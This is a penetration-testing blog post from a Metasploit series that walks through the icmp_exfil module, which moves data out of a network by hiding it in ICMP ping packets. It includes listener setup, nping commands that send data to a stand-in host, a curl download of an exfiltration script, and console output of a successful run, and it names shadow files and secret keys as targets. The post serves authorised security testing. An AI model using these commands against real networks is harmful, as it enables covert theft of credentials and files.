12 Days of HaXmas: Fun With ICMP Exfiltration

Last updated at Wed, 07 Apr 2021 18:39:32 GMT

This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

Today, I want to go in depth on one of the first modules that we committed in 2013: auxiliary/server/icmp_exfil by Chris John Riley. It was fun then, and it's fun a year later, too.

First off, on your Metasploit listener machine, which needs to be able to hear ICMP ping replies from the Internet, you'll need to make sure you have libpcap headers and the pcaprub gem installed; while this is standard for Metasploit Community and Pro editions, you'll want to double check your installation if you're on the developer (Github-based) edition. If you don't already have the sniffer libraries installed, and you're on a Debian-like system, it's simply a matter of "apt-get install libpcap-dev; bundle install". You'll also need to run Metasploit as root (in most cases) to run the required packet sniffers.

Once you're set, you'll want to run the module, like so:

msf > use auxiliary/server/icmp_exfil 
msf auxiliary(icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliary(icmp_exfil) > set BPF_FILTER icmp and not src Y.Y.Y.36
BPF_FILTER => icmp and not src Y.Y.Y.36
msf auxiliary(icmp_exfil) > run

[*] ICMP Listener started on eth0 (Y.Y.Y.36). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
 

This will start the ICMP listener and let you know what IP address is being monitored. You'll want to note that IP address (or DNS name) before you go on site to your internal client machine, so best to write it on your arm with a Sharpie(tm).

Now, if you just want to send a short text string to your listener, it's pretty straight forward with the suggested client, nping. For example, on the internal client, you could exectute:

# nping msf-listener.ru --icmp -c1 --data-string "BOFexfilt_data.txt"
# nping msf-listener.ru --icmp -c1 --data-string "Here's the secret password: letmein"
# nping msf-listener.ru --icmp -c1 --data-string "EOF"

...and that will end up creating the exfilt_data.txt file on the Metasploit listener.

That's fun and all -- really, it is -- but let's see if we can't get some binary data across the wire. For that, you'll need something a tiny little bit more complex. Today, I wrote a quick script for just that, imaginatively named exfiltrate-data.rb. What this does is take a binary file, convert it to hexified ASCII (so "A" becomes "41", "nul" becomes "00", etc), split it into 1400-byte chunks (remember, one ASCIIfied byte is really two bytes now), and send that with nping's --data option. You can grab this script with "curl -L -o exfiltrate-data.rb https://raw.github.com/todb/junkdrawer/master/exfiltrate-data.rb" if you like.

Now, I'm the first to admit that this script isn't terribly reliable, which is why it's not likely to ship as part of Metasploit any time soon. For example, my traffic management strategy it just to drop in delays between packets, no ICMP-style acks or anything. In other words, I'm pretty much just hoping for the best and the data will get there in the right order. But, this sort of thing turns out to be pretty good for small hunks of data -- PGP secret keys, shadow files, stuff like that. Here's a quick sample run from the listener's terminal:

msf auxiliary(icmp_exfil) > run

[*] ICMP Listener started on eth0 (Y.Y.Y.36). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
[*] 2014-01-01 20:49:32 -0600: ICMP (type 8 code 0) SRC:X.X.X.113 DST:Y.Y.Y.36
[+] Beginning capture of "exfil-data.bin" data
[+] Response sent to X.X.X.113 containing response trigger : "SEND"
[*] Received 1400 bytes of data from X.X.X.113
[....snip....]
[+] Response sent to X.X.X.113 containing response trigger : "OK"
[*] Received 294 bytes of data from X.X.X.113
[+] Response sent to X.X.X.113 containing response trigger : "OK"
[*] 89894 bytes of data recevied in total
[+] End of File received. Saving "exfil-data.bin" to loot
[+] Incoming file "exfil-data.bin" saved to loot
[+] Loot filename: /home/todb/.msf4/loot/20140101205608_default_Y.Y.Y.36_icmp_exfil_538835.bin
[+] Response sent to X.X.X.113 containing response trigger : "COMPLETE"

and here's the client:

$ rvmsudo ./exfiltrate-data.rb msf-listener.ru /bin/ls [*] Exfiltrating /bin/ls to msf-listener.ru in 65 chunks. Starting Nping 0.6.00 ( http://nmap.org/nping ) at 2014-01-01 20:49 CST SENT (1.5212s) ICMP Z.Z.Z.208 > Y.Y.Y.36 Echo request (type=8/code=0) ttl=64 id=27281 iplen=45 RCVD (1.5439s) ICMP Y.Y.Y.36 > Z.Z.Z.208 Echo reply (type=0/code=0) ttl=51 id=14842 iplen=45 Max rtt: 22.595ms | Min rtt: 22.595ms | Avg rtt: 22.595ms Raw packets sent: 1 (45B) | Rcvd: 1 (45B) | Lost: 0 (0.00%) Tx time: 0.00126s | Tx bytes/s: 35742.65 | Tx pkts/s: 794.28 Rx time: 1.00199s | Rx bytes/s: 44.91 | Rx pkts/s: 1.00 Nping done: 1 IP address pinged in 2.52 seconds [*] Sent chunk (1/65) [*] Sent chunk (2/65) [*] Sent chunk (3/65) [ .... snip .... ] [*] Sent chunk (63/65) [*] Sent chunk (64/65) [*] Sent chunk (65/65) [*] Ending file...

So, that's the tour for icmp_exfil. As a packet and protocol nerd, I love modules like this. Now that you've got the background on this particular (and fun!) auxiliary module, feel free to poke around the rest of the auxiliary/server tree and see what strikes your fancy. Happy New Year!